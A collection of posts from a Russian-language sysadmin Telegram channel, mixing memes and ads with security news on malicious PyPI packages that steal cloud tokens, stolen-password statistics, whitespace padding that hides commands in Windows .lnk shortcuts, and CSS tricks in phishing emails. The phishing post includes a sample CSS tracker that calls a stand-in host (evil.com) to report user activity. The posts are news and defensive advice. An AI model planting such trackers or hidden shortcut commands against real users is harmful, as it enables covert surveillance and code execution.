Типичный Сисадмин

В утиль @itmemas

В PyPI обнаружены вредоносные пакеты, похищающие облачные токены. Исследователи ReversingLabs обнаружили вредоносную кампанию в репозитории Python Package Index (PyPI). Злоумышленники загрузили 20 фиктивных библиотек, маскирующихся под утилиты, связанные со временем, но содержащих скрытый функционал для кражи чувствительных данных, включая токены доступа к облачным сервисам. ⚠️ Зараженные пакеты (суммарно более 14 100 загрузок до удаления):

snapshot-photo (2,448) time-check-server (316) time-check-server-get (178) time-server-analysis (144) time-server-analyzer (74) time-server-test (155) time-service-checker (151) aclient-sdk (120) acloud-client (5,496) acloud-clients (198) acloud-client-uses (294) alicloud-client (622) alicloud-client-sdk (206) amzclients-sdk (100) awscloud-clients-core (206) credential-python-sdk (1,155) enumer-iam (1,254) tclients-sdk (173) tcloud-python-sdks (98) tcloud-python-test (793)

Часть пакетов использовалась для отправки данных на инфраструктуру злоумышленников. Другая группа имитировала облачные клиенты для Alibaba Cloud, Amazon Web Services и Tencent Cloud, но при этом тайно собирала и отправляла облачные секреты. Любопытный факт: Три пакета (acloud-client, enumer-iam и tcloud-python-test) были указаны как зависимости в относительно популярном GitHub-проекте accesskey_tools (42 форка, 519 звезд), что способствовало их распространению. Типичный 🎹 Сисадмин

Observability как культура: как внедрить её в команду? Приглашаем обсудить это на бесплатном вебинаре от учебного центра Слёрм. О чем поговорим: 🔸 как убедить команду и руководство в важности observability; 🔸 зачем вообще это внедрять; 🔸 с какими культурными барьерами может столкнуться команда; 🔸 какие практические шаги предпринять, чтобы донести ценность; 🔸 как подготовиться к будущим вызовам. И, конечно, всеми любимые факапы из реальной жизни — про это мы точно не забудем! Когда: 1 апреля в 19:30 📌 Занять место на вебинаре — через бота.

Легенда гласит, что однажды у удаленного работника из-за сильного ветра вылетел ноут прямо из окна 🤔 Пользователь выбежал искать ноут на земле, а увидел следующее, сделав фото висящего ноута. К счастью, боец выжил и вернулся в строй, отделавшись легким испугом. Типичный 💨 Сисадмин

#предложка Еще немного списания

👥 Демодень Труконф: настоящие чаты и ВКС 2 апреля Труконф покажет, как победить хаос и перестать копить чаты и звонить коллегам в разрозненных приложениях — WhatsApp, Zoom, Skype for Business и других. Всё это в рамках продуктового шоу в Москве, где соберутся ИТ-профи и эксперты по UC и сервисам для рабочих коммуникаций со всей страны. Присоединяйтесь! 🖥 Что вас ждёт 🔵 Анонс 5 новых решений, а также планов по развитию экосистемы Труконф 🔵 Демонстрация TrueConf Server 5.5 с продвинутым мессенджером, чат-ботами и другими полезными изменениями 🔵Презентация TrueConf 8.5 – нового приложения «всё в одном» для Linux, Windows и macOS 🔵 Новый российский ВКС-терминал TrueConf Group 2.0 и другие обновления решений для переговорных 🔵 TrueConf для ОС «Аврора», Android и iOS — все возможности настольных приложений в вашем кармане 🔵 Обзор рынка ПО для коммуникаций 2025-2026 🔵 Свободное общение, большая демозона и розыгрыш призов. 🗓 2 апреля в 10:00 📍 Москва, ул. Верхняя Красносельская, д. 11А, стр. 4, отель «Москва Красносельская» ➡️ Обязательно регистрируйтесь: https://trueconf.ru/demoday2025/ Реклама. ООО "Труконф", ОГРН 1177746109815, erid: 2Vtzqwghf9q

Списали. АдминЪ ⚰️ Типичный 🫡 Сисадмин

⌨️ Хакеры знают почти половину паролей, введённых в интернете Анализ Cloudflare показал, что 41% успешных входов на сайты (с защитными механизмами Cloudflare) выполнены с украденными паролями. Что обнаружил анализ? • С сентября по ноябрь 2024 года 76% попыток входа с утекшими паролями на сайтах WordPress были успешными. • Почти половина таких входов осуществлена ботами. В чем опасность: • Боты активно используют утёкшие данные из баз вроде Have I Been Pwned для атак credential stuffing. • 95% попыток входа с утекшими паролями осуществляются ботами. • CMS-системы, такие как WordPress, Joomla и Drupal, особенно уязвимы из-за стандартных механизмов аутентификации. А какой у вас самый сложный пароль? 🌚 Типичный 🥸 Сисадмин

Microsoft игнорирует 8-летнюю уязвимость в ярлыках, которую используют для шпионажа. Trend Micro ZDI бьет тревогу: обнаружена масштабнейшая кампания APT-атак, эксплуатирующая уязвимость ZDI-CAN-25373 в файлах-ярлыках Windows (.lnk). Эта брешь позволяет злоумышленникам скрытно выполнять вредоносные команды на машинах жертв, маскируя их в безобидных на вид ярлыках. Microsoft получила подробный эксплойт (proof-of-concept) от Trend Micro, но реакция "корпорации добра" поражает своей невозмутимостью. Уязвимость классифицирована как... "низкоприоритетная", ведь это всего лишь "проблема отображения в интерфейсе", а не какая-то там security дыра 🏥 Суть уязвимости: Эксплуатация ZDI-CAN-25373 основана на хитром манипулировании отображением содержимого .lnk файлов. Атакующие создают файлы-ярлыки, в которых поле COMMAND_LINE_ARGUMENTS (куда прописываются аргументы запуска целевого файла) заполняется огромным количеством невидимых символов-разделителей (whitespace characters):

\x20 - Пробел \x09 - Горизонтальная табуляция \x0A - Перенос строки \x0B - Вертикальная табуляция \x0C - Прогон страницы \x0D - Возврат каретки

В результате такого замусоривания стандартный интерфейс Windows попросту не может отобразить всю командную строку в поле "Объект". В итоге, вредоносные команды, которые реально будут выполнены при клике на ярлык, остаются скрыты от глаз пользователя. Из-за этого избыточного "мусора" Windows UI оказывается не в состоянии корректно отобразить все содержимое поля "Объект" (Target) в свойствах ярлыка. Фактические вредоносные команды, которые будут выполнены при запуске ярлыка, оказываются скрытыми от глаз пользователя за пределами видимой области. Как это работает на практике: 🟢Злоумышленник создает зловредный .lnk файл. 🟢В COMMAND_LINE_ARGUMENTS добавляется "тонна" пробелов/табуляций, за которыми прячется вредоносная команда (например, скачивание и запуск PowerShell-скрипта). 🟢При просмотре свойств ярлыка жертва видит лишь путь к безобидному файлу и длинную полосу пустых символов. 🟢Скрытая магия в конце командной строки остается незамеченной. 🟢При запуске ярлыка Windows честно выполняет всю командную строку, включая скрытый зловредный код. Интересные технические детали от Trend Micro: Некоторые особо креативные северокорейские APT-группы (Earth Manticore, Earth Imp) догадались раздувать размер .lnk файлов до 70 МБ!, нашпиговывая их избыточным whitespace и прочим "балластом" для лучшей маскировки 🍔 А использование комбинаций \x0A и \x0D в некоторых случаях приводило к тому, что в свойствах ярлыка в поле "Объект" отображался всего один выделяемый символ, скрывая всю остальную вредоносную начинку. З.Ы. Теперь при подозрительном ярлыке первым делом выделяйте всю его командную строку – вдруг там прячется "километр" пробелов с сюрпризом. Будьте бдительны и берегите свои сети💚 Типичный 🥸 Сисадмин

#предложка Ничего необычно, на старой работе системник видеонаблюдения и тяжеленный ибп стояли прям на этом армстронге. Б-безопастность 👨‍🦳 Типичный 🌚 Сисадмин

Клуб "Сделай сам" вербует новобранцев. #предложка Типичный 🎩 Сисадмин

👾 На российском процессоре Эльбрус-8СВ запустили Minecraft YouTube-канал Elbrus PC Play для запуска взял «старенькую» версию Minecraft 1.12.2; а в «роли Java» использовал OpenJDK 8. • Нагрузка на видеокарту обычно была на уровне 5-15% • На процессор — 10-20%, иногда поднималась до 30%. 🥸 godnoTECH - Новости IT

Вместе с ростом количества и усложнения кибератак и отсутствием автоматизированных подходов к реагированию на инциденты растут риски для бизнеса. При этом лишь 36% компаний в большинстве случаев находят нарушителей, а почти четверть уже сталкивались с критичными кибератаками. К2 Кибербезопасность и Kaspersky комплексно проанализировали рынок SOC и выяснили, как бизнес подходит к построению процессов мониторинга и реагирования. Вы узнаете: ✅ Как SOC ускоряет обнаружение и устранение инцидентов ✅ Какие сложности существуют при подключении или внедрении SOC  ✅ О чем надо помнить при построении собственного SOC  ✅ Какие технические средства наиболее эффективны в управлении инцидентами? Получить полный текст исследования можно по ссылке 😉

#предложка Очень страшно начинать 😶 🥸: Еще больше масла в огонь подливает тот факт, что на стуле следы от обуви... Какова вероятность, что предыдущий админ выпилился? Типичный 😬 Сисадмин

🔧 Обновление BIOS длилось более 100 часов: уникальный случай с платой Biostar • Пользователь Reddit с ником GoatWithAGun решил обновить BIOS своей системной платы BioStar A320MH — процесс начался, сразу пошёл странно, но при этом не прекращался. • Обновление не завершалось: сначала час, потом сутки, а в итоге — более 100 часов. • В итоге процесс завершился сбоем, и система перестала работать. Интересно, спустя первый час его ничего не смутило? 😂 Типичный 🥸 Сисадмин

Эпоксидной смолой залить и юзать как стол @itmemas

🛡 Безопасность начинается с контроля Привилегированный доступ открывает путь к ключевым системам компании, но вместе с этим несёт риски, которые могут обернуться серьёзными потерями. Информационная безопасность – это грамотное управление угрозами, чтобы бизнес работал без сбоев и утечек. Как держать риски под контролем, не жертвуя эффективностью? Знакомьтесь с Avanpost SmartPAM – системой, где ИИ и две нейросети следят за каждым шагом админов, как строгий родитель за школьником с домашним заданием. Видеозапись сессий, умные сигнатуры опасных действий и изоляция паролей – тут всё, чтобы ваши данные оставались под надёжной защитой. Хотите узнать больше? Подробности – в tg-канале AVANPOST 🔗

Новый фишинг: Использование CSS для обхода спам-фильтров и слежки за пользователями. Специалисты Cisco Talos опубликовали данные о новой технике, которую хакеры применяют для доставки фишинговых писем и слежки за жертвами. В отличие от традиционных методов с использованием JavaScript, здесь задействуется CSS, что усложняет обнаружение современными почтовыми фильтрами. Как это работает, в двух словах: Злоумышленники встраивают в HTML-письмо хитрый CSS-код, который: 🟢Прячет фишинговый контент: Используют CSS-свойства вроде text-indent: -9999px, opacity: 0 и другие, чтобы скрыть вредоносные элементы от глаз пользователей и простых спам-фильтров, которые смотрят на видимый текст. 🟢Организует слежку: Через @media-запросы (например, @media (max-width: 600px)) отслеживают взаимодействие с письмом – изменение размера окна, клики и т.п. – и отправляют данные на сервер злоумышленников. 🟢Обходит детекцию: Без JavaScript письмо выглядит менее подозрительно для систем, которые заточены на ловлю скриптов или вредных вложений. Вот пример кода для наглядности:

<style>
  .tracker { display: none; }
  @media (max-width: 600px) {
    .tracker { display: block; background: url('http://evil.com/track?user=1'); }
  }
</style>
<div class="tracker"></div>

Принцип работы трекера: Изменение размера окна просмотра письма (например, открытие на телефоне) может активировать скрытые элементы CSS. Эти элементы, в свою очередь, инициируют запросы к внешним ресурсам, расположенным на сервере злоумышленников, тем самым отслеживая активность пользователя. Технические нюансы: 🟢JavaScript free: Вся схема работает только на HTML и CSS, что делает ее устойчивой к блокировщикам скриптов. 🟢Слабое место фильтров: Большинство спам-фильтров пока не умеют глубоко анализировать CSS на предмет таких штук, а сигнатуры еще не обновились. 🟢Вариативность сокрытия: Кроме text-indent и opacity, могут использовать position: absolute с отрицательными координатами или font-size: 0 для маскировки текста. Главное – скрыть видимое, но сохранить работоспособность трекера при рендеринге. Что делать сисадминам, чтобы не пропустить новый фишинг: 🟢Прокачать фильтры: Настроить почтовые шлюзы на более глубокий анализ CSS в HTML-письмах. Для SpamAssassin, например, можно добавить правила для отлова подозрительных @media-запросов. 🟢Мониторить исходящий трафик: Следить за запросами к подозрительным доменам из почтовых клиентов, особенно если видите запросы на загрузку фоновых изображений (background: url()). 🟢Просвещать пользователей. Пока это не массовая история, но метод реально обходит стандартные защиты и может стать трендом. Возможен рост таких атак, особенно в корпоративной среде. Пора пересесть на lynx и читать почту в терминале 😬 Типичный 🥸 Сисадмин

Искусство обхода копирайта от Google: модель Gemini 2 Flash ловко удаляет водяные знаки с изображений. И ставит свой собственный, едва заметный 😬 Авторское право – штука серьезная (в некоторых местах). Google пока никак не прокомментировал эту ситуацию. Фотостоки напряглись 😶 Типичный 🥸 Сисадмин

#предложка Мы как-то iRu взяли. Я первые несколько секунд был озадачен. Типичный 🤔 Сисадмин